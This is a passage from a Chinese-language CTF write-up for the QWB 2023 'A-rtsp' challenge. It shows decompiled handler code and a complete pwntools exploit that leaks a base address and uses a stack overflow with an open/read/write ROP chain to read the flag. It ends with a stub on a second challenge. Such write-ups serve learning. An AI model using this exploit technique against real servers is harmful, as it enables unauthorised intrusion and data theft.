<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall RTSPServer::RTSPClientConnection::handleCmd_SET_PARAMETER(</span><br><span class="line">        RTSPServer::RTSPClientConnection *this,</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *a2,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> a3)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> s1[<span class="number">215</span>]; <span class="comment">// [rsp+20h] [rbp-E0h] BYREF</span></span><br><span class="line">  <span class="type">char</span> v6; <span class="comment">// [rsp+F7h] [rbp-9h]</span></span><br><span class="line">  <span class="type">int</span> v7; <span class="comment">// [rsp+F8h] [rbp-8h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> i; <span class="comment">// [rsp+FCh] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  s1[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; (<span class="type">int</span>)(a3 - <span class="number">14</span>) &gt; (<span class="type">int</span>)i; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !strncasecmp(<span class="string">&quot;DESCRIBE_FLAG:&quot;</span>, &amp;a2[i], <span class="number">0xE</span>uLL) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">for</span> ( i += <span class="number">14</span>; i &lt; a3 &amp;&amp; (a2[i] == <span class="number">32</span> || a2[i] == <span class="number">9</span>); ++i )</span><br><span class="line">        ;</span><br><span class="line">      v7 = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">while</span> ( i &lt; a3 )</span><br><span class="line">      &#123;</span><br><span class="line">        v6 = a2[i];</span><br><span class="line">        <span class="keyword">if</span> ( v6 == <span class="number">13</span> || v6 == <span class="number">10</span> )</span><br><span class="line">          <span class="keyword">break</span>;</span><br><span class="line">        s1[v7++] = v6;</span><br><span class="line">        ++i;</span><br><span class="line">      &#125;</span><br><span class="line">      s1[v7] = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">strcmp</span>(s1, <span class="string">&quot;qwb&quot;</span>) )</span><br><span class="line">    <span class="keyword">return</span> RTSPServer::RTSPClientConnection::setRTSPResponse(this, <span class="string">&quot;200 OK&quot;</span>);</span><br><span class="line">  *((_DWORD *)this + <span class="number">10084</span>) = <span class="number">3</span>;</span><br><span class="line">  <span class="keyword">return</span> RTSPServer::RTSPClientConnection::setRTSPResponse(this, <span class="string">&quot;202 OK&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>最后就是栈溢出orw</p>
<p><strong>exp:</strong></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*- encoding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># context(os = &#x27;linux&#x27;, arch = &#x27;amd64&#x27;, log_level = &#x27;info&#x27;)</span></span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>, log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="comment"># context.terminal = [&#x27;tmux&#x27;, &#x27;splitw&#x27;, &#x27;-h&#x27;]</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>, <span class="number">8554</span>)</span><br><span class="line"><span class="comment">#p = remote(&quot;8.147.132.53&quot;,36720)</span></span><br><span class="line"><span class="comment">#p =  process(&#x27;./A-rtsp&#x27;)</span></span><br><span class="line"><span class="comment">#-----------------------------------------------------------------------------------------</span></span><br><span class="line">r = <span class="keyword">lambda</span>              : p.recv(<span class="number">4096</span>)</span><br><span class="line">rl = <span class="keyword">lambda</span> a=<span class="literal">False</span>     : p.recvline(a)</span><br><span class="line">ru = <span class="keyword">lambda</span> a,b=<span class="literal">True</span>    : p.recvuntil(a,b)</span><br><span class="line">rn = <span class="keyword">lambda</span> x             : p.recvn(x)</span><br><span class="line">s = <span class="keyword">lambda</span> x            : p.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x           : p.sendline(x)</span><br><span class="line">sa = <span class="keyword">lambda</span> a,b         : p.sendafter(a,b)</span><br><span class="line">sla = <span class="keyword">lambda</span> a,b        : p.sendlineafter(a,b)</span><br><span class="line">uu32 = <span class="keyword">lambda</span>           : u32(p.recv(<span class="number">4</span>).ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64 = <span class="keyword">lambda</span>           : u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">irt = <span class="keyword">lambda</span>            : p.interactive()</span><br><span class="line">dbg = <span class="keyword">lambda</span> text=<span class="literal">None</span>  : gdb.attach(p, text)</span><br><span class="line">lg = <span class="keyword">lambda</span> s,addr      : log.info(<span class="string">&#x27;\033[1;31;40m %s --&gt; 0x%x \033[0m&#x27;</span> % (s,addr))</span><br><span class="line"><span class="comment">#-----------------------------------------------------------------------------------------</span></span><br><span class="line"></span><br><span class="line">s(<span class="string">b&#x27;GET_PARAMETER rtsp://192.168.127.133:8554/* RTSP/1.0\r\nCSeq: 2\r\nGET_INFO: 2023\r\n\r\n&#x27;</span>)</span><br><span class="line">baseaddr = <span class="built_in">int</span>(rl(<span class="string">&quot;0\n&#x27;&quot;</span>)[-<span class="number">15</span>:],<span class="number">16</span>)-<span class="number">0x2A9990</span></span><br><span class="line"><span class="comment">#codebase = rl(&quot;0\n&#x27;&quot;)</span></span><br><span class="line"><span class="built_in">print</span>(baseaddr)</span><br><span class="line"></span><br><span class="line">s(<span class="string">b&#x27;SET_PARAMETER rtsp://192.168.127.133:8554/* RTSP/1.0\r\nDESCRIBE_FLAG: qwb\r\nCSeq: 2\r\nUser-Agent: fuck\r\n\r\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_ret = <span class="number">0x000000000007b133</span>+baseaddr </span><br><span class="line">pop_rsi_ret=<span class="number">0x0000000000099fb0</span>+baseaddr </span><br><span class="line">pop_rdx_ret=<span class="number">0x0000000000019eaa</span>+baseaddr </span><br><span class="line">pop_rax_ret = <span class="number">0x0000000000035e4a</span>+baseaddr</span><br><span class="line">syscall = <span class="number">0x0000000000019eac</span>+baseaddr</span><br><span class="line"></span><br><span class="line">flag = baseaddr+<span class="number">0x7B3E5</span></span><br><span class="line"><span class="comment">#rop =pop_rax_ret+ p6(59)+ pop_rdi_ret + bin_sh + pop_rsi_ret + p64(0) + pop_rdx_ret + p64(0) + syscall_ret</span></span><br><span class="line"></span><br><span class="line">rop=p64(pop_rdi_ret)+p64(flag)+p64(pop_rsi_ret)+p64(<span class="number">0</span>)+p64(pop_rax_ret)+p64(<span class="number">2</span>)+p64(syscall) <span class="comment">#open</span></span><br><span class="line">rop+=p64(pop_rdi_ret)+p64(<span class="number">6</span>)+p64(pop_rsi_ret)+p64(baseaddr+<span class="number">0x2A9990</span>)+p64(pop_rdx_ret)+p64(<span class="number">0x60</span>)+p64(pop_rax_ret)+p64(<span class="number">0</span>)+p64(syscall)</span><br><span class="line">rop+=p64(pop_rdi_ret)+p64(<span class="number">5</span>)+p64(pop_rsi_ret)+p64(baseaddr+<span class="number">0x2A9990</span>)+p64(pop_rdx_ret)+p64(<span class="number">0x60</span>)+p64(pop_rax_ret)+p64(<span class="number">1</span>)+p64(syscall)</span><br><span class="line"></span><br><span class="line">s(<span class="string">b&#x27;DESCRIBE rtsp://192.168.127.133:8554/&#x27;</span> +<span class="string">b&quot;a&quot;</span>*<span class="number">198</span>+<span class="string">b&quot;/&quot;</span>+<span class="string">b&quot;a&quot;</span>*<span class="number">198</span>+ <span class="string">b&#x27; RTSP/1.0\r\nvul_string:&#x27;</span> + <span class="string">b&#x27;\xa7&#x27;</span> *<span class="number">13</span> + rop + <span class="string">b&#x27;\r\nCSeq: 2\r\n\r\n&#x27;</span>)</span><br><span class="line">data=r()</span><br><span class="line"><span class="built_in">print</span>(data)</span><br><span class="line">irt()</span><br></pre></td></tr></table></figure>
<p>最后一步还有一个最关键的点就是循环时的数组下标其也是在溢出范围内的,所以溢出时需要对其进行恢复,否则就会出错</p>
<p>在有些wp中提到在进行其他操作之前,需要先进行一次<code>SETUP</code>方法调用,来拿到一个<code>session</code></p>
<p>但实际上这应该是常规协议的要求,因为题目代码的魔改,其实不用也行</p>
<p>此外还要注意这类与端口交互的题目,写flag都要写到sockfd上,这样才能被接收,至于如何找到这个fd,最简单粗暴的方法就是一个一个遍历了</p>
<h2 id="拾遗"><a href="#拾遗" class="headerlink" title="拾遗"></a>拾遗</h2><p>这类题目重点在于查找信息</p>
<p>找到关键的题目源码,协议使用标准</p>
<p>最后找到题目被修改后潜藏漏洞的点,否则纯靠逆向,狗都不逆了属于是</p>
<h1 id="simpleinterpreter"><a href="#simpleinterpreter" class="headerlink" title="simpleinterpreter"></a>simpleinterpreter</h1><p>一道解释器题目</p>
<p>看wp说github上有源码,可惜没找到</p>
<p>从字符串可以看出支持的功能有以下这些</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.rodata:0000000000003FC8	00000065	C	char else enum if int return sizeof while read close printf malloc free memset memcmp exit void main</span><br></pre></td></tr></table></figure>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#A-rtsp"><span class="toc-number">1.</span> <span class="toc-text">A-rtsp</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#rtsp"><span class="toc-number">1.1.</span> <span class="toc-text">rtsp</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8A%A5%E6%96%87%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.1.1.</span> <span class="toc-text">报文格式</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.2.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8B%BE%E9%81%97"><span class="toc-number">1.3.</span> <span class="toc-text">拾遗</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#simpleinterpreter"><span class="toc-number">2.</span> <span class="toc-text">simpleinterpreter</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ixout.github.io/posts/36820/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ixout.github.io/posts/36820/&text=强网杯2023两道题"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ixout.github.io/posts/36820/&is_video=false&description=强网杯2023两道题"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=强网杯2023两道题&body=Check out this article: https://ixout.github.io/posts/36820/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ixout.github.io/posts/36820/&name=强网杯2023两道题&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ixout.github.io/posts/36820/&t=强网杯2023两道题"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023-2024
    ixout
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
